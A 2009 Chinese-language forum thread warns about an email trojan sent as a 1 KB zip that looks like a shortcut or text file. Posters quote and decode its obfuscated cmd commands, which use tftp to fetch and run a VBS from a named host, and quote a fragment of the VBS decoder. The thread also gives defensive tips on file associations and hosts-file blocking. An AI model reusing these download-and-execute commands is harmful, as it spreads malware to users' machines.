他附加檔很小.
只有1K.
解壓縮後是一個類似捷徑的圖示.
執行指令如下.
也請各位網友多注意這種散播方式!語法:%CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT
他附加檔很小.
只有1K.
解壓縮後是一個類似捷徑的圖示.
執行指令如下.
也請各位網友多注意這種散播方式!語法:%CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT
此文章於 2009-11-20 08:58 AM 被 ericlien 編輯。
解出來就是這樣:
o.bat 的內容就會是這樣:語法:%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT echo StARt f.vBS>>o.BaT o.bat
抓下來的 F.VBs 內容:語法:tftP tftft.NEt gEt t F.Vbs StARt f.vBS
至於執行後有啥後果?語法:sub k for i=1 to UBound(s) r=r&chr(s(i)-823) next Set kk = CreateObject("Wscript.Shell") kk.run r,0 end sub s=array(836,922 ... 中略 ... 942,870) k
就要試試才知道了.
以上資料轉自 三秒練功房
用這種方式來躲避防毒軟體已經流行一陣子了
只要連結還在,那麼下載的病毒就能不斷變種
我的Hotmail信箱也從在線上遊戲認識不久的網友那收到了類似的東西,問她有沒有寄,他說沒有。
以下是信件內容,這些人想必跟盜帳號還有詐騙集團有牽連,希望牠們趕快被抓去關。(附上病毒檔案, 請小心取用; 下載後檔名是: _玩笑.zip_, 我只改了檔名)
===================================================
♂∵▼我把你的照片拼裝成這樣拉↖×⊙
寄件者: X X ([email protected])
寄件日期: 2009年11月25日 上午 05:56:12
收件者: [email protected]
附件: 1 個附件
玩笑.zip (1.1 KB)
只是和你開個玩笑而已
我把你的照片拼裝成這樣拉,看看,是不是粉有意思,不過你可不要生氣
我只是跟你開個玩笑而已!!!不過很好玩
∵∴◇←◆××◇▽↖↑∵∵▼▽▽◆﹥◇←↖■▽→▽﹦↓←◇﹥
此文章於 2009-11-27 01:10 PM 被 大灰芒果 編輯。
它是會不斷更新的,我朋友的電腦中了此毒,第一次他電腦傳給我類似的電郵,防毒掃了沒有反應;
第二次傳來,電郵主旨內容都不同,但是附件都是1.1k大小,防毒開始認到它是病毒;
今天,第三次傳來,電郵主旨內容又改了,但是附件都是1.1k大小 ,可惜的是,防毒又掃不到了,所以說此毒會自動更新的
我不會解碼,以上是它的命令列參數,看起來跟發文大收到的木馬檔是同一系列。%COmsPec% /C EChO %d%Tp%N%%d%%D%T.neT%n%GEt%n%T%N%W.Vbs>b.BAT
&ecHO START%N%w.VBS>>B.BAT&sEt d=tF&seT n= &B.BAt
附圖:它故意把自己的圖示弄成文字檔的,開啟後會自動縮小視窗執行以上指令。
此文章於 2009-11-27 01:19 PM 被 大灰芒果 編輯。
解完語法:%COmsPec% /C EChO %d%Tp%N%%d%%D%T.neT%n%GEt%n%T%N%W.Vbs>b.BAT ecHO START%N%w.VBS>>B.BAT sEt d=tF seT n= B.BAt
b.bat內容就是...語法:%COmsPec% /C EChO tFTp tFtFT.neT GEt T W.Vbs>b.BAT ecHO START w.VBS>>B.BAT B.BAt
基本上跟uason是差不多的語法:tFTp tFtFT.neT GEt T W.Vbs START w.VBS
只是換個檔名而已
現在這種.lnk的,看到會膩了...
而且目前也少見相當多了,
大概大家都有因應的對付方法
此文章於 2009-11-27 01:35 PM 被 tvirus 編輯。
請把BAT & CMD 預設關聯程式改成記事本, VBS 也比照辦理, 或是只改BAT & CMD, 反正這三種類型的程式用到的機會實在很低
我已經在hosts增加一筆資料
127.0.0.1 tftft.NEt
暫時可以防止連上該站.
不過這種惡意網址以後可能會越來越多!
書籤